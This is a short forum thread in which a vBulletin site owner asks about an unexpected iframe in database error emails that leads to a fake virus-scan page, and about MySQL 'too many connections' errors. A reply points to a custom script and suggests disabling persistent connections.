Default DB Error message Question

I have two questions for the wonderful people here...

On 4/9/2008 and prior, my vBulletin Database Error e-mails looked like:

On 4/23/2008 and ever since then, the next database error that I received via e-mail looked like this:

I obviously don't pay enough attention to it, because I never noticed the iframe HTML until just now. Then I couldn't believe I missed it for the past month.

So -- two questions:

1. What the heck is the iframe doing in my database error? I took out the count.php?o=2 and it takes me to some fake virus scan page.
2. How do I increase the active connections so that I don't get this message? We only had some 50 guests and members on and then I got the error message 3 times.

Your first error is caused by some kind of modification or custom script (topXstats.php). You need to consult the author on how to fix your problem.

For the second error, here is an extract from the manual:

mysql_connect(): Too many connections
The server has maxed out the number of MySQL connections it allows. You can try turning persistent connections off by adding this to your config.php:
PHP Code:
$config['MasterServer']['usepconnect'] = 0
But if you still have problems after that, you will need ask your host to raise the maximum number of connections they allow.
